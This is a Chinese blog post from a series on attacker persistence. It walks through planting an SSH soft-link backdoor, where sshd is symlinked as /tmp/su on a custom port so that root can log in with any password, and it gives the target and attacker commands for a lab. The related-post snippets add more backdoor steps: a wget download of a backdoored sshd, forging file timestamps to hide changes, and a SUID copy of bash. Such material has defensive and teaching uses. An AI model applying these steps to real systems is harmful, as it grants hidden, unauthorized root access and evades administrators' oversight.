操作系统权限维持(十)之Linux系统-SSH 软连接后门

最新推荐文章于 2023-08-22 13:34:19 发布
最新推荐文章于 2023-08-22 13:34:19 发布
阅读量457 收藏 1
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux ssh 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129794977
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门

SSH 软连接后门

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测 uid 0 即可认证成功,这样就导致了可以使用任意密码登录:

实验环境

机器名IP属性
kali192.168.52.130攻击机
kali192.168.52.132靶机

在靶机上执行

ln -sf /usr/sbin/sshd /tmp/su 
/tmp/su -oPort=8080

在这里插入图片描述

在攻击机上执行

ssh root@192.168.52.132 -p 8080

命令执行完后,密码随便输入,就登陆到了靶机的root用户

在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSH软链接后门利用和原理
Jeeseen123的博客
08-23 1297
SSH软链接后门利用和原理 本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。 00 利用前提 ssh配置中开启了PAM进行身份验证 查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM 01 建立后门 建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234 注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep "pam_r
基于Linux操作系统SSH.rar
07-25
**SSH(Secure Shell)**是一种网络协议,用于在不安全的网络上安全地远程登录到Linux操作系统,并执行命令、传输文件和其他操作。SSH通过加密所有传输的数据,确保了通信的安全性,防止了中间人攻击和其他形式的...
Linux系统安全之ssh后门
weixin_34321753的博客
09-30 169
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门ssh#ht...
SSH软连接后门
weixin_45209228的博客
03-13 347
SSH软连接后门
ssh软链接后门
weixin_45261436的博客
05-26 308
利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok模块中使得 uid 为 0 可以直接通过认证而不需要输入密码,这样就导致了可以使用任意密码登录。如:我们的软链接文件为/tmp/su,那么应用就会找/etc/pam.d/su作为配置文件,那么则实现了无密登录。当我们通过特定的端口连接ssh后,应用在启动过程中就会去找到配置文件。出现的则可以用作软链接名称。
linux 简单ssh后门,Linux软连接ssh后门之我见
weixin_39682897的博客
05-12 941
0x00 前言学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章0x01简单回顾一、Linux经典软连接后门命令1.在被控制端执行:ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345建立sshd的软连接2.本地客户端执行:ssh [emailprotected] -p 12345接着输...
LINUX 安装SSHBD后门
weixin_30385925的博客
11-26 194
老牌的SSH后门了,功能稳定 备份原文件:1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old3、下载并安装ssh后门:shell-# wget http://www.down.com/sshbd.tgzshell-# tar zxvf sshbd.tg...
使用VSCode的Remote-SSH连接Linux进行远程开发
09-14
在Windows上,使用`ssh-keygen`生成SSH密钥对。默认情况下,私钥文件位于`~/.ssh/id_rsa`,公钥文件为`~/.ssh/id_rsa.pub`。 #### 服务器端配置 将公钥文件`id_rsa.pub`的内容复制到Linux服务器上`~/.ssh/...
计算机Linux操作系统远程连接
最新发布
05-05
Xshell [1]是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中享受他们的工作...
linux操作系统下配置ssh/sftp和权限设置方法
01-10
基于 ssh 的 sftp 服务相比 ftp 有更好的安全性(非明文帐号密码传输)和方便的权限管理(限制用户的活动目录)。 1、开通 sftp 帐号,使用户只能 sftp 操作文件, 而不能 ssh服务器 2、限定用户的活动目录,使...
linux 简单ssh后门,Linux OpenSSH后门的添加与防范
weixin_29276847的博客
05-12 496
03 还原新配置文件为旧配置文件的时间执行以下命令,使ssh_config和sshd_config文件的修改时间与ssh_config.old和sshd_config.old文件一致。touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config...
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 2491
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
LINUX后门--教程(二)—— SSH软链接后门
W小哥
06-02 4622
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、添加SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机) ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 ...
SSH的软链接后门
a790308的博客
08-26 1538
之前说过为了防止SSH的后面漏洞 , 升级到高版本的OpenSSH , 那也不能保证万无一失 经典后门 直接对sshd建立软连接 , 之后用任意密码登录即可 看下面操作 创建完软连接后 创建新的会话 端口自定义 用户root 密码任意输入 登录成功 换个普通用户 登录成功 转载于:https://www.cnbl...
一种古老的Linux后门
看不尽的尘埃——博客
01-20 496
前言 实践才是检验真理的唯一标准! 过程 这种方式需要先用root权限复制/bin/bash,命令如下: cp /bin/bash /.backdoor 赋予所有用户都可以执行这个/.backdoor的权限,命令如下: chmod 4755 /.backdoor 添加一个低权限用户,命令如下: useradd test 给test用户添加密码,命令如下: pas...
后门设置总结
weixin_30640769的博客
12-21 1543
前言 没有最好的后门,只有最合适的后门。 时光荏苒,岁月如梭,在这篇文章里,我将对后门的各种形式进行解读和总结,这不仅仅是能帮你找到回忆,更希望的是能给予大家帮助、启发思考。 后门种类繁多,林林总总,根据不同的需求出现了很多奇怪好玩的后门。它可以是一行简单的代码,也可以是复杂的远控木马,它可以是暴力的,也可以是很优雅的。 在整体架构上,一个优秀的后门应该充分考虑其功能、触发方式和通信方...
各类后门整理!【白帽黑客必备生存技能】
dfdhxb995397的博客
08-03 632
Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep ...
linux经典一句话后门(我认为的)
07-10 650
今天在看某牛的博客时看到的linux一句话后门,所以在这边记录一下,详细的解释看文末参考 1.1 后门代码 目标主机上执行:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=888;攻击机上执行: ssh root@x.x.x.x -p 888 1.2 解释代码 解释一下上面的代码,ln在linux中代表“连接数据”,学...
通过SSH后门(创建ssh软链接)
songling515010475的专栏
05-10 2199
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
Linux常见的持久化后门汇总1
08-03
"这篇文档汇总了Linux系统中的两种常见持久化后门方法,分别是SSH软连接后门和利用公钥免密登录。" 在Linux环境中,黑客常常利用系统的特性来创建持久化的后门,以便在获取初步访问权限后能够长期控制服务器。本文...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值